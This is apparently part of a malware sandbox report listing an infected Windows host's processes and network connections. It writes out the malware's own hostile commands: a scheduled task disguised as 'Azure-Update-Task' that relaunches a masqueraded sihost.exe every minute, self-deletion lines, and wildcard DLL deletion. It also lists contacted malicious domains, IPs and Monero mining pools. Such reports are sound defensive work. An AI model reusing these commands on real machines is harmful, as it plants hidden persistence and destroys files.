"C:\Users\Admin\AppData\Local\Temp\4208.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe

"C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe"

C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build3.exe

"C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build3.exe"

C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe

"C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe"

C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build3.exe

"C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\6919.exe"

C:\Users\Admin\AppData\Local\Temp\I6OtBIZpf0.exe

"C:\Users\Admin\AppData\Local\Temp\I6OtBIZpf0.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im build2.exe /f

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Users\Admin\AppData\Local\Temp\C8CE.exe

C:\Users\Admin\AppData\Local\Temp\C8CE.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Users\Admin\AppData\Local\Temp\5B0D.exe

C:\Users\Admin\AppData\Local\Temp\5B0D.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5B0D.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe

"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe

"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Roaming\juubrcw

C:\Users\Admin\AppData\Roaming\juubrcw

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe

C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe --Task

C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe

C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe --Task

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Roaming\juubrcw

C:\Users\Admin\AppData\Roaming\juubrcw

C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe

C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe --Task

C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe

C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe --Task

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe

C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe --Task

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe

C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe --Task

C:\Users\Admin\AppData\Roaming\juubrcw

C:\Users\Admin\AppData\Roaming\juubrcw

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 hsiens.xyz udp
US 172.67.142.91:80 hsiens.xyz tcp
US 8.8.8.8:53 www.listincode.com udp
US 144.202.76.47:443 www.listincode.com tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 a.goatgame.co udp
US 104.21.79.144:443 a.goatgame.co tcp
US 8.8.8.8:53 startupmart.bar udp
US 104.21.37.182:443 startupmart.bar tcp
US 8.8.8.8:53 statuse.digitalcertvalidation.com udp
US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 8.8.8.8:53 qwertys.info udp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
US 104.21.20.198:443 qwertys.info tcp
US 8.8.8.8:53 yelty.info udp
US 104.21.17.186:443 yelty.info tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 wheelllc.bar udp
US 172.67.136.53:443 wheelllc.bar tcp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 iplogger.com udp
DE 88.99.66.31:443 iplogger.com tcp
US 104.21.37.182:443 startupmart.bar tcp
US 8.8.8.8:53 liveme31.com udp
US 8.8.8.8:53 google.vrthcobj.com udp
US 8.8.8.8:53 google.vrthcobj.com udp
US 172.67.132.120:80 liveme31.com tcp
JP 34.97.69.225:53 google.vrthcobj.com udp
SC 185.215.113.104:18754 tcp
DE 88.99.66.31:443 iplogger.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 connectini.net udp
DE 88.99.66.31:443 iplogger.com tcp
N/A 127.0.0.1:49719 tcp
N/A 127.0.0.1:49721 tcp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 phonefix.bar udp
US 172.67.131.66:443 phonefix.bar tcp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 live.goatgame.live udp
US 104.21.70.98:443 live.goatgame.live tcp
US 8.8.8.8:53 real-web-online.bar udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 104.21.74.148:443 real-web-online.bar tcp
RU 45.9.20.20:13441 tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 phonefix.bar udp
US 172.67.131.66:443 phonefix.bar tcp
SC 185.215.113.104:18754 tcp
US 8.8.8.8:53 www.iyiqian.com udp
RU 103.155.92.58:80 www.iyiqian.com tcp
US 8.8.8.8:53 requestimmersive.com udp
US 162.0.220.187:80 requestimmersive.com tcp
US 8.8.8.8:53 www.mhmvc.xyz udp
RU 188.225.87.175:80 www.mhmvc.xyz tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 google.com udp
US 104.26.12.31:443 api.ip.sb tcp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 151.139.128.14:80 crl.usertrust.com tcp
US 8.8.8.8:53 connectini.net udp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
DE 162.55.179.90:80 162.55.179.90 tcp
US 8.8.8.8:53 a.upstloans.net udp
US 172.67.179.248:443 a.upstloans.net tcp
US 162.0.220.187:80 requestimmersive.com tcp
US 162.0.210.44:443 connectini.net tcp
UA 194.145.227.159:80 194.145.227.159 tcp
US 8.8.8.8:53 source3.boys4dayz.com udp
US 104.21.33.188:443 source3.boys4dayz.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 aa.goatgamea.com udp
US 172.67.221.12:443 aa.goatgamea.com tcp
US 8.8.8.8:53 bb.goatgamed.com udp
US 104.21.30.211:443 bb.goatgamed.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 fsstoragecloudservice.com udp
BG 111.90.156.46:80 fsstoragecloudservice.com tcp
NL 142.250.179.132:80 www.google.com tcp
US 8.8.8.8:53 b.upstloans.net udp
US 172.67.179.248:443 b.upstloans.net tcp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 172.67.179.248:443 b.upstloans.net tcp
US 172.67.179.248:443 b.upstloans.net tcp
US 8.8.8.8:53 a.goatgame.co udp
US 104.21.79.144:443 a.goatgame.co tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 www.profitabletrustednetwork.com udp
US 8.8.8.8:53 htagzdownload.pw udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 venetrigni.com udp
US 3.209.145.5:443 venetrigni.com tcp
US 3.209.145.5:443 venetrigni.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 hanner-blobal.com udp
US 34.196.146.107:443 hanner-blobal.com tcp
US 34.196.146.107:443 hanner-blobal.com tcp
US 8.8.8.8:53 mj22.xyz udp
US 172.67.143.150:80 mj22.xyz tcp
US 172.67.143.150:80 mj22.xyz tcp
US 172.67.143.150:443 mj22.xyz tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 varmisende.com udp
KR 211.170.70.236:80 varmisende.com tcp
US 8.8.8.8:53 sanctam.net udp
SE 185.65.135.234:58899 sanctam.net tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 collect.installeranalytics.com udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
RU 95.181.163.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
NL 51.15.55.162:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 pastebin.com udp
US 104.23.99.190:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.54.102:14433 xmr-eu1.nanopool.org tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
KW 37.34.248.24:80 varmisende.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 fernandomayol.com udp
KR 211.59.14.90:80 fernandomayol.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
KR 211.59.14.90:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 8.8.8.8:53 iceanedy.com udp
US 104.21.86.39:443 iceanedy.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
SC 185.215.113.29:8678 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
NL 146.70.35.170:30905 tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 securebiz.org udp
MT 37.75.41.110:80 securebiz.org tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 104.26.12.31:443 api.ip.sb tcp
US 104.26.12.31:443 api.ip.sb tcp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 api.2ip.ua udp
UA 77.123.139.190:443 api.2ip.ua tcp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
MY 103.169.90.205:80 103.169.90.205 tcp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 telete.in udp
DE 195.201.225.248:443 telete.in tcp
MD 5.181.156.77:80 5.181.156.77 tcp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
UA 77.123.139.190:443 api.2ip.ua tcp
MT 37.75.41.110:80 securebiz.org tcp
US 8.8.8.8:53 tbpws.top udp
MX 187.177.183.85:80 tbpws.top tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
MX 187.177.183.85:80 tbpws.top tcp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
DE 162.55.179.90:80 162.55.179.90 tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 jaliemaval.xyz udp
RU 95.213.165.250:80 jaliemaval.xyz tcp
US 8.8.8.8:53 htagzdownload.pw udp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 tuzlacastajanslari.bykmedya.com udp
TR 31.192.214.222:80 tuzlacastajanslari.bykmedya.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
DE 144.76.183.53:63565 tcp
US 8.8.8.8:53 htagzdownload.pw udp
KR 211.59.14.90:80 fernandomayol.com tcp
MY 103.169.90.205:80 tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
KR 211.59.14.90:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
DE 195.201.225.248:443 telete.in tcp
MD 5.181.156.77:80 5.181.156.77 tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 config.teams.microsoft.com udp
US 52.113.194.132:443 config.teams.microsoft.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 162.0.220.187:80 requestimmersive.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.12:443 www.profitabletrustednetwork.com tcp
US 192.243.59.12:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 venetrigni.com udp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 3.209.145.5:443 venetrigni.com tcp
US 3.209.145.5:443 venetrigni.com tcp
US 8.8.8.8:53 best-protection4.me udp
US 104.21.82.246:443 best-protection4.me tcp
US 104.21.82.246:443 best-protection4.me tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.bing.com udp
US 131.253.33.200:443 www.bing.com tcp
US 131.253.33.200:443 www.bing.com tcp
US 8.8.8.8:53 vexacion.com udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 kimoangel.info udp
US 8.8.8.8:53 my.rtmark.net udp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 104.248.185.101:443 kimoangel.info tcp
US 104.248.185.101:443 kimoangel.info tcp
US 8.8.8.8:53 www.mcafee.com udp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 tags.tiqcdn.com udp
US 8.8.8.8:53 images.scanalert.com udp
NL 65.9.83.32:443 images.scanalert.com tcp
NL 65.9.83.32:443 images.scanalert.com tcp
US 8.8.8.8:53 dpm.demdex.net udp
IE 34.248.156.174:443 dpm.demdex.net tcp
IE 34.248.156.174:443 dpm.demdex.net tcp
US 8.8.8.8:53 s.go-mpulse.net udp
NL 104.80.224.132:443 s.go-mpulse.net tcp
NL 104.80.224.132:443 s.go-mpulse.net tcp
US 8.8.8.8:53 mcafee12.tt.omtrdc.net udp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 54.69.39.99:443 mcafee12.tt.omtrdc.net tcp
US 54.69.39.99:443 mcafee12.tt.omtrdc.net tcp
US 8.8.8.8:53 c.go-mpulse.net udp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
US 8.8.8.8:53 1737ad5a.akstat.io udp
NL 104.80.224.132:443 1737ad5a.akstat.io tcp
NL 104.80.224.132:443 1737ad5a.akstat.io tcp
US 8.8.8.8:53 trial-eum-clienttons-s.akamaihd.net udp
NL 23.209.125.81:443 trial-eum-clienttons-s.akamaihd.net tcp
NL 23.209.125.81:443 trial-eum-clienttons-s.akamaihd.net tcp
US 8.8.8.8:53 trial-eum-clientnsv4-s.akamaihd.net udp
US 8.8.8.8:53 154-61-71-51_s-23-209-125-81_ts-1631393494-clienttons-s.akamaihd.net udp
NL 104.109.143.146:443 trial-eum-clientnsv4-s.akamaihd.net tcp
NL 104.109.143.146:443 trial-eum-clientnsv4-s.akamaihd.net tcp
NL 23.209.125.81:443 154-61-71-51_s-23-209-125-81_ts-1631393494-clienttons-s.akamaihd.net tcp
NL 23.209.125.81:443 154-61-71-51_s-23-209-125-81_ts-1631393494-clienttons-s.akamaihd.net tcp
US 8.8.8.8:53 ti6uom3inwhzeyj5c3la-pt22gn-92280ce07-clientnsv4-s.akamaihd.net udp
NL 104.109.143.146:443 ti6uom3inwhzeyj5c3la-pt22gn-92280ce07-clientnsv4-s.akamaihd.net tcp
NL 104.109.143.146:443 ti6uom3inwhzeyj5c3la-pt22gn-92280ce07-clientnsv4-s.akamaihd.net tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 151.101.36.157:443 static.ads-twitter.com tcp
NL 151.101.36.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 c.evidon.com udp
DE 23.45.239.236:443 c.evidon.com tcp
DE 23.45.239.236:443 c.evidon.com tcp
US 8.8.8.8:53 l.evidon.com udp
US 52.200.158.249:443 l.evidon.com tcp
US 52.200.158.249:443 l.evidon.com tcp
US 52.200.158.249:443 l.evidon.com tcp
US 8.8.8.8:53 smetrics.mcafee.com udp
FR 13.36.218.177:443 smetrics.mcafee.com tcp
FR 13.36.218.177:443 smetrics.mcafee.com tcp
US 8.8.8.8:53 w.usabilla.com udp
US 54.158.67.235:443 w.usabilla.com tcp
US 54.158.67.235:443 w.usabilla.com tcp
US 8.8.8.8:53 analytics.twitter.com udp
US 104.244.42.131:443 analytics.twitter.com tcp
US 104.244.42.131:443 analytics.twitter.com tcp
US 8.8.8.8:53 t.co udp
US 104.244.42.197:443 t.co tcp
